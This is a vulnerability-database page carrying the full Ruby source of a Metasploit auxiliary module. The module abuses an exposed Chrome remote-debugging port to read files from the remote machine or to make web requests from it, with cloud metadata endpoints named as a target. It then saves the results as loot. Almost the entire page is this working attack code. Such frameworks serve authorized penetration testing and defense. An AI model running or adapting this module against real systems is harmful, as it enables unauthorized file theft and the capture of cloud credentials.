Lucene search
K

Chrome Debugger Arbitrary File Read / Arbitrary Web Request

🗓️ 25 Sep 2019 20:58:34Reported by Adam Baldwin (Evilpacket), Nicholas Starke (The King Pig Demon)Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 53 Views

Chrome Debugger Arbitrary File Read / Arbitrary Web Request module uses Chrome Debugger's API to read files from remote file system and make web requests. It can target cloud metadata endpoints

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'eventmachine'
require 'faye/websocket'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Chrome Debugger Arbitrary File Read / Arbitrary Web Request',
      'Description' => %q{
        This module uses the Chrome Debugger's API to read
        files off the remote file system, or to make web requests
        from a remote machine.  Useful for cloud metadata endpoints!
      },
      'Author' => [
        'Adam Baldwin (Evilpacket)', # Original ideas, research, proof of concept, and msf module
        'Nicholas Starke (The King Pig Demon)' # msf module
      ],
      'DisclosureDate' => '2019-09-24',
      'License' => MSF_LICENSE
    ))

    register_options(
      [
        Opt::RPORT(9222),
        OptString.new('FILEPATH', [false, 'File to fetch from remote machine.']),
        OptString.new('URL', [false, 'Url to fetch from remote machine.']),
        OptInt.new('TIMEOUT', [true, 'Time to wait for response', 10])
      ]
    )

    deregister_options('Proxies')
    deregister_options('VHOST')
    deregister_options('SSL')
  end

  def run
    if (datastore['FILEPATH'].nil? || datastore['FILEPATH'].empty?) && (datastore['URL'].nil? || datastore['URL'].empty?)
      print_error('Must set FilePath or Url')
      return
    end

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => '/json'
    })

    if res.nil?
      print_error('Bad Response')
      return
    end

    data = JSON.parse(res.body).pop
    EM.run do
      file_path = datastore['FILEPATH']
      url = datastore['URL']

      if file_path
        fetch_uri = "file://#{file_path}"
      else
        fetch_uri = url
      end

      print_status("Attempting Connection to #{data['webSocketDebuggerUrl']}")

      unless data.key?('webSocketDebuggerUrl')
        fail_with(Failure::Unknown, 'Invalid JSON')
      end

      driver = Faye::WebSocket::Client.new(data['webSocketDebuggerUrl'])

      driver.on :open do
        print_status('Opened connection')
        id = rand(1024 * 1024 * 1024)

        @succeeded = false

        EM::Timer.new(1) do
          print_status("Attempting to load url #{fetch_uri}")
          driver.send({
            'id' => id,
            'method' => 'Page.navigate',
            'params' => {
              url:  fetch_uri
            }
          }.to_json)
        end

        EM::Timer.new(3) do
          print_status('Sending request for data')
          driver.send({
            'id' => id + 1,
            'method' => 'Runtime.evaluate',
            'params' => {
              'expression' => 'document.documentElement.outerHTML'
            }
          }.to_json)
        end
      end

      driver.on :message do |event|
        print_status('Received Data')

        data = JSON.parse(event.data)

        if data['result']['result']
          loot_path = store_loot('chrome.debugger.resource', 'text/plain', rhost, data['result']['result']['value'], fetch_uri, 'Resource Gathered via Chrome Debugger')
          print_good("Stored #{fetch_uri} at #{loot_path}")
          @succeeded = true
        end
      end

      EM::Timer.new(datastore['TIMEOUT']) do
        EventMachine.stop
        fail_with(Failure::Unknown, 'Unknown failure occurred') unless @succeeded
      end
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Feb 2021 13:31Current
0.3Low risk
Vulners AI Score0.3
53